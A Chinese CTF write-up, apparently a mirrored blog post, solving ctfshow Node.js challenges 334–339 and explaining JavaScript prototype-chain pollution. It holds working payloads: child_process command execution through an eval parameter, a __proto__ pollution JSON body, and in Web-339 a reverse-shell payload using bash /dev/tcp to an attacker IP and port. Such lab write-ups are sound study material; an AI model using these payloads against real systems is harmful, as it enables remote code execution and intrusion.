Nodejs及stfshow相关例题

Nodejs及stfshow相关例题

Node.js 是一个基于 Chrome V8 引擎的 Javascript 运行环境。可以说nodejs是一个运行环境,或者说是一个 JS 语言解释器而不是某种库。

  • Node.js可以生成动态页面内容
  • Node.js 可以在服务器上创建、打开、读取、写入、删除和关闭文件
  • Node.js 可以收集表单数据
  • Node.js 可以添加、删除、修改数据库中的数据

Node.js 就是运行在服务端的 JavaScript。

Node.js 是一个基于 Chrome JavaScript 运行时建立的一个平台。

Node.js 是一个事件驱动 I/O 服务端 JavaScript 环境,基于 Google 的 V8 引擎,V8 引擎执行 Javascript 的速度非常快,性能非常好

Web-334

这个题直接看附件足够

var findUser = function(name, password)//这个函数接受两个参数
{return users.find(function(item)//find函数把function(item)这个回调函数作为参数 最后的返回给find函数的值须满足以下条件{return name!=='CTFSHOW' && item.username === name.toUpperCase() && item.password === password;});//return users.find使用 users.find 方法在 users 数组中查找一个满足条件的元素
};

主要是看以上的代码

toUpperCase()作用是把小写字母转为大写

其中的item在另一个文件中

module.exports = {items: [{username: 'CTFSHOW', password: '123456'}]
};

由上可知我们输入的账号在经过function(item)这个函数处理后要符合username: 'CTFSHOW', password: '123456'而且要满足输入的账户名name!=='CTFSHOW'所以

输入

username:CTFSHOw//只要不是CTFSHOW即可
password:123456

如图:

image-20240515205222817

Web-335

进入靶场发现啥都没有看一下页面源代码

如图:

image-20240515210931782

看到提示eval函数,eval中可以执行js代码,可以试试使用这个函数进行测试

payload

?eval=require('child_process').spawnSync('ls',['./']).stdout.toString()

对payload的解释

require 是 Node.js 中用来引入模块的函数,在这里引用了Node.js的child_process模块

child_process 模块是 Node.js 标准库中的一个模块,它提供了创建子进程的功能,可以通过它执行系统命令、shell 脚本等。其中包含有spawnSync()方法,spawnSync函数可以用来执行系统命令

spawnSync(‘ls’,[‘./’]) 前面代表命令,后面是一个参数,这里的 ./ 代表着当前目录, …/ 代表上一级目录…/…/ 代表上上级目录

这中间用于连接的两个点是用来访问对象属性的

'stdout’是一个缓冲区,它包含了子进程的标准输出,也就是说输出的内容在这里toString()转换为字符串
image-20240515212301306

由题可得fl00g.txt即为flag

payload:

?eval=require('child_process').spawnSync('cat',['fl00g.txt']).stdout.toString()

image-20240515212709173

Web-336

操作和上一关一样不过只是变了一下文件名字罢了

屏幕截图 2024-05-15 213021

屏幕截图 2024-05-15 213109

Web-337

针对此题我刚开始还想着md5加密绕过可是我发现当我加上flag后MD5加密后就不同了

新知识:在 JavaScript 中,当你尝试将一个对象与一个字符串进行拼接时,对象会被隐式转换为字符串。这个转换的默认行为是调用对象的 toString() 方法,对于普通对象(如 { x: '1' }{ x: '2' }),默认的 toString() 方法会返回 [object Object]

a={'x':'1'}
b={'x':'2'}
console.log(a + "flag{xxx}")
console.log(b + "flag{xxx}")#[object Object]flag{xxx}
#[object Object]flag{xxx}

所以payload:?a[x]=1&b[y]=2只要是两个数组即可

如图:

屏幕截图 2024-05-20 213632

原型链污染

先来了解啥是原型链

// 定义一个构造函数
function Person(name, age) {this.name = name;this.age = age;
}// 在构造函数的原型对象上定义一个方法
Person.prototype.sayHello = function() {console.log(`Hello, my name is ${this.name} and I am ${this.age} years old.`);
};// 创建一个 Person 实例
const person1 = new Person('Alice', 25);// 调用该实例的 sayHello 方法
person1.sayHello(); // 输出:Hello, my name is Alice and I am 25 years old.// 查看该实例的原型对象
console.log(person1.__proto__); // 输出:{ sayHello: [Function] }// 查看该实例的原型对象的原型对象
console.log(person1.__proto__.__proto__); // 输出:{ constructor: [Function: Object], ... }

在以上的代码中**person1.__proto__**表示对象person1的原型对象

person1.__proto__.__proto__表示对象person1的原型对象的原型对象

可以把这个对象一层一层的看成原型链

原型链污染

首先区分一个概念prototype 属性被用于在函数的原型上定义方法和属性,而 __proto__ 属性被用于实现实例对象和构造函数之间的继承关系。

例子:

// 定义一个基础对象,包含一个 getName 方法
const baseObj = {getName: function() {return 'I am a base object';}
};// 定义一个恶意对象,通过原型链污染修改了 getName 方法
const maliciousObj = {getName: function() {return 'I am a malicious object';}
};
maliciousObj.__proto__ = baseObj; // 修改原型对象为 baseObj// 创建一个普通的对象,并访问 getName 方法
const normalObj = {};
console.log(normalObj.getName()); // 输出:Uncaught TypeError: normalObj.getName is not a function// 修改 normalObj 对象的原型为 maliciousObj
Object.setPrototypeOf(normalObj, maliciousObj);// 此时再次访问 getName 方法,输出被污染的内容
console.log(normalObj.getName()); // 输出:I am a malicious object

prototype和__proto__分别是什么

javascript中我们要定义一个类,需要以定义构造函数的方式来定义

function Foo(){this.bar = 1
}
new Foo()

Foo函数的内容,就是Foo类的构造函数,而this.bar就是Foo类的一个属性.一个类必然有一些方法,类似属性this.bar,我们也可以将方法定义在构造函数的内部

function Foo() {this.bar = 1this.show = function() {console.log(this.bar)}
}(new Foo()).show()

但是这样写有一个问题,就是每当我们创建一个Foo对象的时候,this.show = function 就会执行一次,这个show方法实际上是绑定在对象上面的,而不是绑定在类中.我们希望在创建类的时候只创建一次show方法,增时候就需要使用原型(prototype)了

function Foo(){this.bar = 1
}
Foo.prototype.show = function show() {console.log(this.bar)
}
let foo = new Foo()
foo.show()

我们可以认为原型prototype是类Foo的一个属性,而所有用Foo类实例化的对象,都将拥有这个属性中的所有内容,包括变量和方法.比如上面的foo对象,其天生就有foo.show()方法

我们可以通过Foo.prototype来访问Foo类的原型,但是Foo实例化出来的对象,是不能通过prototype访问原型的.这个时候,就该到_proto_

一个Foo实例化出来的foo对象,可以通过foo.__proto__属性来访问Foo类的原型

foo.__proto__ = Foo.prototype//prototype是一个类的属性,所有类对象在实例化的时候将会拥有prototype中的属性和方法
一个对象的__proto__属性,指向这个对象所在类的prototype属性

javascript原型链继承

所有类对象在实例化的时候会将拥有prototype中的属性和方法,这个特性被用来实现javascript中的继承机制

function Father(){this.first_name = "Donald"this.last_name = "Trump"}
function Son(){this.first_name = "Melania"}Son.prototype = new Father()let son = new Son()
console.log(`Name: ${son.first_name} ${son.last_name}`)

Son类继承了father类的last_name属性,最后输出的是Name: Melania Trump.对于对象son,在调用son.last_name时,实际上javascript引擎会进行如下操作

在对象son中寻找last_name
如果找不到,则在son.__proto__中寻找last_name
如果仍然找不到,则继续在son._proto_.__proto__中寻找last_name
依次寻找,直到找到null结束.比如,object.prototypt的__proto__就是null

javascript的这个查找的机制,被用在面向对象的继承之中,被称作prototype继承链

每一个构造函数(constructor)都有一个原型对象(prototypt)
对象的__proto__属性,指向类的原型对象prototype
javascript使用prototype链实现继承机制
原型链污染

foo.__proto__指向的是Foo类中的prototype.那么,如果我们修改了foo.__proto__中的值,是不是就可以修改Foo类

//foo是一个简单的javascript对象
let foo = {bar:1}//foo.bar此时为1
console.log(foo.bar)//修改foo的原型(即object)
foo.__proto__.bar = 2//由于查找顺序的愿意,foo.bar依然是1
console.log(foo.bar)//此时在用object创建一个空的zoo对象
let zoo = {}//查看zoo.bar
console.log(zoo.bar)

因为虽然我们把foo的原型给改了但是因为在进行原型链查找的时候顺序是先查自身再向原型查

所以console.log(foo.bar)中的foo.bar输出为一但是由于zoo.bar本身为空所以console.log(zoo.bar)输出为2

在所有js代码片段中Object.prototype 是所有对象的默认原型所以foo.__proto__.bar = 2实际是改的是在这个代码段的原型

哪些情况下原型链会有污染呢

找找能够控制数组(对象)的"键名"操作就好

对象merge
对象clone(其实内核就是将待操作对象merge到一个空对象中)
function merge(target,source){for(let key in source){if (key in source && key in target){merge(target[key],source[key])}else{target[key] = source[key]}}
}

在合并的时候,存在赋值的操作target[key] = source[key],那么这个key如果是_proto_,是不是可以原型链污染呢

let o1 = {}
let o2 = {a: 1, "__proto__": {b:2}}
merge(o1,o2)
console.log(o1.a,o2.b)
o3 = {}
console.log(o3.b)

合并虽然成功了,但是原型链并没有污染

这是因为,我们用javascript创建o2的过程(let o2 = {a: 1,“proto”:{b:2}})中,__proto__已经代表了o2的原型,此时遍历o2所有的键名,拿到的是[a,b],__proto__并不是一个key,自然也不会修改object的原型

let o1 = {}
let o2 = JSON.parse('{"a":1,"__proto__":{"b":2}}')
merge(o1,o2)
console.log(o1.a,o2.b)o3 = {}
console.log(o3.b)

由上可见o3已经被污染

当使用merge函数将o2的内容复制到o1中时,o2中的__proto__会将原型设置为b:2所以console.log(o3.b)为2

实战:

Web-338

下载了附件后我们可以在routes中找到login.js这个javascript文件

router.post('/', require('body-parser').json(),function(req, res, next) {res.type('html');var flag='flag_here';var secert = {};var sess = req.session;let user = {};utils.copy(user,req.body);if(secert.ctfshow==='36dboy'){res.end(flag);}else{return res.json({ret_code: 2, ret_msg: '登录失败'+JSON.stringify(user)});  }});

从以上代码片段中提取到的关键信息是

utils.copy(user,req.body); if(secert.ctfshow==='36dboy'){ res.end(flag);}意思是这个页面会从请求体中获取javascript数据

但是我们如果我们只是传入ctfshow==='36dboy’只会改变user但是获得flag检查的是secert又因为secert为空所以我们选择改变原型使用_proto_ 这样便可实现原型链污染

注:utils.copy(user, req.body) 获取数据的类型是由中间件决定的require('body-parser').json()所以以上代码会获取请求体中的 JavaScript 数据

先抓一个登录包

如图:

屏幕截图 2024-05-22 220814

按照以上思路改包:

屏幕截图 2024-05-22 223336

payload:

"__proto__":{"ctfshow":"36dboy"}

注意:proto前后各是两个下划线

Web-339

进入这关后发现多了一个文件api 先看一下login发现在这个文件中没办法实现原型链污染

因为条件是if(secert.ctfshow===flag)的但是var flag='flag_here';所以没办法

然后我们可以去看看api这个文件

router.post('/', require('body-parser').json(),function(req, res, next) {res.type('html');res.render('api', { query: Function(query)(query)});});

我们可以把Function(query)(query)当成一个突破口(Function定义了一个动态函数 这个函数会接受参数query 后面的(query)会调用这个函数执行query参数中的代码)

我们可以利用这个来进行反向shell

payload:(放在请求包中即可)

"__proto__":  {"query":"return global.process.mainModule.constructor._load('child_process').exec('bash -c \"bash -i >& /dev/tcp/ip/port 0>&1\"'')"
}

注意:其中的ip和端口port要换成服务器对应的公网ip和端口

(为什么在这里污染的的是原型不直接污染query?)

因为如果只是污染query那么这行代码只能在当前对象中起作用只有污染了原型后恶意代码才能在全局中起作用

如图:

image-20240523173608190

访问路由/api即可进行反向shell(注意监听端口)

然后便可得到flag

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/840152.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

解决无法启动Redis,打开redis-server闪退的问题

【问题】 ① 双击redis-server.exe闪退。 ② 终端运行redis-server没反应。 但是终端运行redis -cli没问题。 【解决方法】 步骤1:找到Redis文件夹,右击,在终端打开。 步骤2:输入命令:redis-server.exe redis.windows…

深入解析力扣161题:相隔为 1 的编辑距离(逐字符比较与动态规划详解)

❤️❤️❤️ 欢迎来到我的博客。希望您能在这里找到既有价值又有趣的内容,和我一起探索、学习和成长。欢迎评论区畅所欲言、享受知识的乐趣! 推荐:数据分析螺丝钉的首页 格物致知 终身学习 期待您的关注 导航: LeetCode解锁100…

【简单介绍下爬山算法】

🌈个人主页: 程序员不想敲代码啊 🏆CSDN优质创作者,CSDN实力新星,CSDN博客专家 👍点赞⭐评论⭐收藏 🤝希望本文对您有所裨益,如有不足之处,欢迎在评论区提出指正,让我们共…

信息学奥赛初赛天天练-10-组合数学-排列组合-一次彻底搞懂分组分配问题

更多资源请关注纽扣编程微信公众号 平均分组 是指将所有的元素分成所有组元素个数相等或部分组元素个数相等,即m个不同的元素平均分成n个组,有多少种分组方法 由于是平均分组,分组选择元素时会出现重复,因此结果需要除以A(n,n…

代码随想录-算法训练营day46【动态规划08:单词拆分、多重背包!背包问题总结篇!】

代码随想录-035期-算法训练营【博客笔记汇总表】-CSDN博客 第九章 动态规划part08● 139.单词拆分 ● 关于多重背包,你该了解这些! ● 背包问题总结篇! 详细布置 关于 多重背包,力扣上没有相关的题目,所以今天大家的…

知了传课Flask学习(持续更新)

一、基础内容 1.Flask快速应用 pip install flask from flask import Flaskapp Flask(__name__)app.route(/) def index():return Hello worldif __name__ __main__:app.run() 2.debug、host、port配置 from flask import Flask,requestapp Flask(__name__)app.route(/) d…

【全部更新完毕】2024电工杯A题数学建模详细思路代码文章分享

A 题:园区微电网风光储协调优化配置 摘要 在全球范围内,气候变化和环境污染问题日益严重,减少碳排放和实现可持续发展成为各国的共同目标。新能源,尤其是风能和光伏发电,因其清洁、可再生的特性,正在全球范…

Golang | Leetcode Golang题解之第100题相同的树

题目: 题解: func isSameTree(p *TreeNode, q *TreeNode) bool {if p nil && q nil {return true}if p nil || q nil {return false}queue1, queue2 : []*TreeNode{p}, []*TreeNode{q}for len(queue1) > 0 && len(queue2) > …

nextcloud 安装部署

php版本不对 ubuntu nginx 配置php 网站-CSDN博客 抄自chatgpt ubuntu完全卸载干净某个包-CSDN博客 以及设置基本的php nginx环境参照上面两篇博文 然后参照官方文档 Example installation on Ubuntu 22.04 LTS — Nextcloud latest Administration Manual latest document…

5月30日在线研讨会 | 面向智能网联汽车的产教融合解决方案

随着智能网联汽车技术的快速发展,产业对高素质技术技能人才的需求日益增长。为了促进智能网联汽车行业的健康发展,推动教育链、人才链与产业链、创新链的深度融合,经纬恒润推出产教融合相关方案,旨在通过促进教育链与产业链的深度…

第八节 条件装配案例讲解

一、条件装配的作用是什么 条件装配是 Spring 框架中一个强大的特性&#xff0c;使得开发者能够创建更加灵活和可维护的应用程序。在 Spring Boot 中&#xff0c;这个特性被大量用于自动配置&#xff0c;极大地简化了基于 Spring 的应用开发。 二、条件装配注解 <dependen…

Function Calling 介绍与实战

functions 是 Chat Completion API 中的可选参数&#xff0c;用于提供函数定义。其目的是使 GPT 模型能够生成符合所提供定义的函数参数。请注意&#xff0c;API不会实际执行任何函数调用。开发人员需要使用GPT 模型输出来执行函数调用。 如果提供了functions参数&#xff0c;…

AIGC:AI整活!万物皆可建筑设计

在过去的一年里 AI设计爆火 各行业纷纷将之用于工作中 同时不少网友也在借助它整活 万物皆可设计 甲方骂我方案像屎一样 于是我就回馈他屎一样的方案 他有点惊喜&#xff0c;但是没话 不是吧&#xff0c;随便找了个充电头图片 也能生成建筑设计&#xff01;这都能行 鸟…

【spring】@CrossOrigin注解学习

CrossOrigin介绍 CrossOrigin 是 Spring Framework 中的一个注解&#xff0c;用于处理跨域资源共享&#xff08;CORS&#xff09;问题。CORS 是一种机制&#xff0c;它使用额外的 HTTP 头来告诉浏览器&#xff0c;让运行在一个 origin (domain) 上的Web应用被准许访问来自不同…

虹科Pico汽车示波器 | 免拆诊断案例 | 2017款奔驰E300L车行驶中发动机偶尔无法加速

故障现象 一辆2017款奔驰E300L车&#xff0c;搭载274 920发动机&#xff0c;累计行驶里程约为21万km。车主反映&#xff0c;该车行驶中发动机偶尔无法加速&#xff0c;且车辆发闯。 故障诊断 用故障检测仪检测&#xff0c;发动机控制单元&#xff08;N3/10&#xff09;中存储…

Labelme自定义数据集COCO格式【实例分割】

参考博客 labelme标注自定义数据集COCO类型_labelme标注coco-CSDN博客 LabelMe使用_labelme中所有的create的作用解释-CSDN博客 1制作自己的数据集 1.1labelme安装 自己的数据和上面数据的区别就在于没有.json标签文件&#xff0c;所以训练自己的数据关键步骤就是获取标签文…

Web3探索加密世界:空投常见类型有哪些?附操作教程

每种空投类型都有独特的特征和目的&#xff0c;我们需要了解不同类型的加密空投。本文给大家介绍的是流行的加密货币空投类型&#xff0c;以及一般空投是如何做的。感兴趣的话请看下去。 一、空投常见类型 1、持有者空投 持有者空投向钱包中持有一定数量数字货币的人免费发放…

2024.05.24 学习记录

1、面经复习&#xff1a; js基础、知识深度、js垃圾回收 2、代码随想录刷题&#xff1a;动态规划 完全背包 all 3、rosebush 完成 Tabs、Icon、Transition组件

基于YOLO系列算法(YOLOv5、YOLOv6、YOLOv8以及YOLOv9)和Streamlit框架的行人头盔检测系统

摘要 本文基于最新的基于深度学习的目标检测算法 (YOLOv5、YOLOv6、YOLOv8)以及YOLOv9) 对头盔数据集进行训练与验证&#xff0c;得到了最好的模型权重文件。使用Streamlit框架来搭建交互式Web应用界面&#xff0c;可以在网页端实现模型对图像、视频和实时摄像头的目标检测功能…

C++中获取int最大与最小值

不知道大家有没有遇到过这种要求&#xff1a;“返回值必须是int&#xff0c;如果整数数超过 32 位有符号整数范围 [−2^31, 2^31 − 1] &#xff0c;需要截断这个整数&#xff0c;使其保持在这个范围内。例如&#xff0c;小于 −2^31 的整数应该被固定为 −2^31 &#xff0c;大…